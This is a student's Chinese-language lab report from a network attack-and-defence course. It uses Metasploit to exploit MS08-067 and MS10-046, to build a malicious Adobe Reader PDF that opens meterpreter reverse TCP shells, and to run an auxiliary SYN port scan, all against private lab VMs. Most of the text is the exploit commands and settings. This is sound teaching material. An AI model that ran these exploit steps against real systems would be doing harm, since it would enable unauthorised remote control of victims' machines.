2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
一.原理与实践说明
1.实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
一个主动攻击实践,如ms08-067; (1分)
一个针对浏览器的攻击,如ms11-050;(1分)
一个针对客户端的攻击,如Adobe;(1分)
成功应用任何一个辅助模块。(0.5分)
2.基础问题回答
exploit
是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整个过程。payload
就是需要传送到靶机上的攻击代码本身。encode
是对攻击代码进行完善,伪装,使其能正常运行并且尽量躲避查杀
实践过程
1.Windows服务渗透攻击——MS08-067安全漏洞
实验步骤
先选择靶机为windows xp sp3
在kali终端中开启msfconsole。
输入命令
search ms08_067
,会显示出找到的渗透模块,如下图所示(
输入命令
use exploit/windows/smb/ms08_067_netapi
,进入该漏洞模块的使用输入
show payloads
查看攻击载荷
使用命令
set payload generic/shell_reverse_tcp
设置攻击有效载荷输入命令
show options
显示我们需要在攻击前需要设置的数据,如下图
输入命令
set LHOST 192.168.1.108
输入命令
set RHOST 192.168.1.109
使用命令
show options
再次查看payload状态。
输入命令
exploit
开始攻击,但很不幸,攻击没有成功。
我们换一下另一个虚拟机试一下,这台靶机是win2000,ip地址是192.168.1.114,这次很轻松的成功了。
2.浏览器渗透攻击--ms10_046(靶机WindowsXP)
实验步骤
输入
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
输入
set payload windows/meterpreter/reverse_tcp
查看要输入的参数
show options
输入
set LHOST 192.168.1.108
开始攻击
exploit
将
http://192.168.1.108:80/
在靶机winXP中打开
查看会话效果如下:
输入sessions -i 2即可选择会话,然后就攻击成功
3、针对Adobe Reader软件的渗透攻击——adobe_toolbutton
在kali终端中开启msfconsole。
输入命令
use exploit/windows/fileformat/adobe_cooltype_sing
,进入该漏洞模块的使用。使用命令
set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷。输入命令
show options
显示我们需要在攻击前需要设置的数据
输入命令
set FILENAME 20165317.pdf
set LHOST 192.168.1.108
输入
exploit
,生成pdf
文件,并可以看到pdf
所在文件夹,将pdf复制到靶机里。使用命令back退出当前模块,并使用
use exploit/multi/handler
新建一个监听模块。使用
set payload windows/meterpreter/reverse_tcp
建立一个反向连接。需要输入命令set LHOST
和攻击模块里的数据设置为一样的使用命令
exploit
开始攻击,但是失败了。
最后发现是上一次连接没有断开导致端口被占用,重新监听得到效果如下(14)
4.辅助模块应用
开放端口扫描
使用
show auxiliary
查看可以运用的辅助模块:
使用此模块扫描端口
use auxiliary/scanner/portscan/syn
使用命令
show options
set RHOSTS 192.168.1.109
(目标)set THREADS 50
(线程)exploit
扫描结果如下(16)
实践总结与体会
由于时间和身体原因并未完成要求(和其他同学不同的操作),但是在实验的过程中确实体会到了Windows系统的漏洞很多,能被利用的也很多
离实战还缺些什么技术或步骤?
我觉得最大的问题是如何找到并利用新的漏洞。
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
- 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...
- 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...
- 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8
<网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...
- 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...
- 20165308『网络对抗技术』Exp5 MSF基础应用
20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...
随机推荐
- Laravel 服务容器,IoC,DI
DI DI 就是常说的依赖注入,那么究竟什么是依赖注入呢? 打个比方,电脑(非笔记本哈)需要键盘和鼠标我们才能进行操作,这个‘需要’换句话说就是‘依赖’键盘和鼠标. 那么,相应的,一个类需要另一个类才 ...
- Android串口通信(Android Studio)
gilhub上已有开源项目: https://github.com/cepr/android-serialport-api 可以直接使用
- 利用python打印字符
python unicode ('你好','UTF-8') print u'\u4f60\u597d'
- 配置 Docker 加速器:适用于 Ubuntu14.04、Debian、CentOS6 、CentOS7、Fedora、Arch Linux、openSUSE Leap 42.1
天下容器, 唯快不破 Docker Hub 提供众多镜像,你可以从中自由下载数十万计的免费应用镜像, 这些镜像作为 docker 生态圈的基石,是我们使用和学习 docker 不可或缺的资源.为了解决 ...
- [方案]基于Zynq WiFi方案构建
基于Zynq系列,搭建无线传输平台 1) 2.4G 2) 5G AC
- 一起学Python——数据类型详解
和学习其他编程语言一样,首先要了解一门语言的数据类型. Python的数据类型有整型.浮点型.字符串.布尔型.日期时间类型.list列表.set集合.tuple元组.dict词典等. 1.整型 就是数 ...
- vue-video-player集成videojs-contrib-hls实现.m3u8文件播放
// 安装依赖 npm install vue-video-player --save npm install videojs-contrib-hls --save // 在main.js中全局引入 ...
- PID控制算法的简单分析和仿真!
PID算法简单剖析如下: 1.首先我们来看一下PID系统的基本组成模块: 如图所示,图中相关参数的表示如下: r(t):系统实际上需要的输出值,这是一个标准值,在我们设定了之后让这个系统去逼近的一个值 ...
- hdu5701-中位数计数
题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=5701 题目: Problem Description 中位数定义为所有值从小到大排序后排在正中间的那个 ...
- centos没有可用软件包 libgtk2
在编写一个C程序,使用基于文本的终端图形编程库(curses)或图形界面(QT/GTK),分窗口显示三个并发进程的运行,因为centos并未安装gtk,所以运行命令行安装gtksudo yum -y ...